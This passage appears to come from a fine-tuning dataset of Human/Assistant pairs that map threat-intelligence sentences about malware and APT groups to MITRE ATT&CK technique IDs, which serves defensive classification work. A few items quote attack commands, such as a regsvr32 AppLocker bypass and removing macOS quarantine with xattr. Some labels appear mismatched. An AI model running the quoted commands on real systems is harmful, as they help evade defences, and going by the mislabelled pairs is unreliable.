Hound has deleted and overwrote files to cover tracks.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole uses WinRAR to compress data that is intended to be exfiltrated.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has uploaded files and data from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has also used WMIC for lateral movement as well as during and post compromise cleanup activities.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus can collect the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can inject into a target process including Svchost, Explorer, and cmd using process hollowing.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer can escalate privileges to root by asking the user for credentials.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be done by placing an executable in a commonly trusted directory or giving it the name of a legitimate, trusted program .### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used AdFind.exe to collect information about Active Directory organizational units and trust objects.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 executes commands remotely via cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) In SWCs analyzed by CTU researchers, the threat actors added the Dean Edwards packed JavaScript code shown in Figure 9 to the end of a legitimate website's menu page### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to send collected files over its C2.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The function then uses the built-in Shell function to run the following command, which effectively executes the .sct file stored in 12-B-366.txt: regsvr32.exe /s /n /u /i:%TEMP%\12-B-366.txt scrobj.dll The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE has used FakeTLS for session authentication.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The file is named netwf.dat### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has used a script to parse files like /etc/hosts and SSH known_hosts to discover remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT gathers the OS version, logical drives information, processor information, and volume information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HDoor kills anti-virus found on the victim.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use VB payloads to execute malicious commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,See the following for more information and examples of false flags being used in cyberattacks: Wave your false flags! …or the Nightmares and Nuances of a Self-Aware Attribution Space OlympicDestroyer is here to trick the industry Malware description The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the resulting decoded data### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell has a module to use a rootkit on a system.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET will compress entire ~/Desktop folders excluding all .git folders, but only if the total data size is under 200MB.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework., C:\Windows\System32\utilman.exe### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex can stop and disable services on the system.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has deployed malware that has copied itself to the startup directory for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has used a malicious shim database to maintain persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT3 downloader uses the Windows command ""cmd.exe"" /C whoami.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell has the ability to list and extract data from SQL databases.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has lured victims to launch malicious attachments delivered via spearphishing emails .### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OfficeScan’s Vulnerability Protection shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed. Trend Micro™ Deep Discovery™ provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OLDBAIT can use SMTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling UNC2452 to access enterprise cloud applications and services.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind completes network communication via raw sockets.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can leverage API functions for execution.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY leverages two of the tools the group frequently uses: PowerShell and Windows Management Instrumentation (WMI)### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has sent system information to its C2 server using HTTP.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some variants of Emissary use various XOR operations to encrypt C2 data.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can create a scheduled task for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The .iqy files take advantage of Excel’s willingness to download and include the contents from a remote server in a spreadsheet### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can terminate itself if specific execution flags are not present.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has created self-signed certificates to sign malicious installers.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used AdFind to enumerate remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples of actions are to run a system command or send an email.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack’s dropper contains a keylogging executable.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin has encrypted strings in the binary for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has captured credentials when a user performs login through a SSL session.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has used PowerShell to delete volume shadow copies and download files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has established social media accounts to disseminate victim internal-only documents and other sensitive data.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA459 has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,iKitten adds an entry to the rc.common file for persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password hashes for target services may be obtained using OS Credential Dumping or Kerberoasting.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN can download and upload files to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has nltest /domain_trusts to identify domain trust relationships.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer used a tool called Total SMB BruteForcer to perform internal password spraying.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can implant malicious code into a compromised device's firmware.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook can detect USB devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 used Base64 to obfuscate commands and the payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea adds Registry Run keys to achieve persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT can launch cmd.exe to execute commands on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's host hardware that can be used during targeting.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has dropped encoded executables on compromised hosts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Windows has a command to execute VBS scripts on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's client component is packed with UPX.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can determine the IP and physical location of the compromised host via IPinfo.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about host firmware may only be exposed to adversaries via online or other accessible data sets .### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaBricks has the ability to use bytecode to decrypt embedded payloads.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail can identify the IP address of the victim system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TURNEDUP is capable of writing to a Registry Run key to establish.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,pngdowner uses HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derivative languages based on VB have also been created, such as Visual Basic for Applications and VBScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used JS scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda can launch remote scripts on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can identity the current process on a compromised host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot will delete its dropped files after bypassing UAC.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth spawns a CMD process to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has started a monero service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Embedded Trojan This Trojan loaded by the first payload contains several embedded executables that it uses to ultimately download and execute a secondary payload, as well as downloading and opening a decoy document### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used cmd.exe to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can exfiltrate files via the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 actors deleted tools and batch files from victim systems.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common uses include cmd to execute a single command, or abusing cmd interactively with input and output forwarded over a command and control channel.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account .### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT was identified on disk with a filename of taskhostsvc.exe and it created an encrypted log file at C:\Windows\Temp\vmware-vmdmp.log.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The executable obtains an embedded PowerShell script, decrypts it using RC4, then decompresses it using ZLIB, and saves the cleartext to C:\Users\\AppData\Roaming\Out.jpg### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke compressed data with zlib prior to sending it over C2.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used trojanized Microsoft Word documents sent via email, which prompted the victim to enable macros.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Briba creates run key Registry entries pointing to malicious DLLs dropped to disk.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keydnap uses a copy of tor2web proxy for HTTPS communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerberos is an authentication protocol widely used in modern Windows domain environments.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A FinFisher variant uses DLL search order hijacking.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE stores its configuration file within the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has collected the operating system version from the infected system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the cookie is obtained through Steal Web Session Cookie or Web Cookies, the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has delayed execution using a built-in function to avoid detection and analysis.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used regsvr32 to run their backdoor.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro has the ability to start and stop a specified service.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,winrm### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon uses TCP and UDP for C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may spoof the parent process identifier of a new process to evade process-monitoring defenses or to elevate privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 actors have used gsecdump to dump credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has the ability to download additional tools from the C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind saves information from its keylogging routine as a .zip file in the present working directory.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT can download files remotely.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT uses DNS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may perform Endpoint Denial of Service attacks to degrade or block the availability of services to users.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Lazarus Group malware families gather a list of running processes on a victim system and send it to their C2 server.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi silently executes received commands with cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 8 shows the network communication of the Pause.ps1 download### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used a screen capture utility to take screenshots on a compromised host.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microsoft refers to its implementation of the Remote Desktop Protocol as Remote Desktop Services .### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The C2 server sends back Base64 encoded response### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MechaFlounder has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao can use the ping command to discover remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used string encoding with floating point calculations.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands such as net user /domain and net group /domain of the Net utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key has sent its public key to the C2 server over TCP.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has deleted scripts after execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors have also enumerated the IPv4 TCP connection table via the GetTcpTable2 API call.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can utilize command line options to allow an attacker control over how it scans and encrypts files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can create a remote shell and execute commands using cmd.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot deletes all artifacts associated with the malware from the infected machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The VBScript has a SHA256 has of 649e3922ec53d5b195ed23aac08148faeb561f47e891b1e6ff60a2a9df4fea17, which calls two PowerShell commands to download and execute a payload and downloading and opening of a decoy document### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, PowerShell versions 5+ includes Script Block Logging which can record executed script content.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy deletes any temporary files it creates FALLCHILL can delete malware and associated artifacts from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore can access the victim's webcam and capture data.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ptrace system call injection is commonly performed by writing arbitrary code into a running process then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind encrypts C2 traffic using RC4 with a static key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla exploits CVE-2017-11882 in Microsoft’s Equation Editor to execute a process.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data could also be concealed within the transferred files.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has captured victim IP address details.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has has used net user /dom and net user Administrator to enumerate domain accounts including administrator accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can use DirectoryList to enumerate files in a specified directory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commonly targeted services include the following: * SSH * Telnet * FTP * NetBIOS / SMB / Samba * LDAP * Kerberos * RDP / Terminal Services * HTTP/HTTP Management Services * MSSQL * Oracle * MySQL * VNC In addition to management services, adversaries may ""target single sign-on and cloud-based applications utilizing federated authentication protocols,"" as well as externally facing email applications, such as Office 365.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can clear process memory by overwriting it with junk bytes.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries will create fake social media accounts and message employees for potential job opportunities.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Such files often pose as email attachments and allow an adversary to gain Initial Access into a user’s system via Spearphishing Attachment then User Execution.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Reaver variants use raw TCP for C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle technique to support follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer decrypts code to connect to a remote C2 server.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TinyZBot can create a shortcut in the Windows startup folder for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may also span both native defenses as well as supplemental capabilities installed by users and administrators.### Assistant: T1562: Impair Defenses" "### Human:Find the 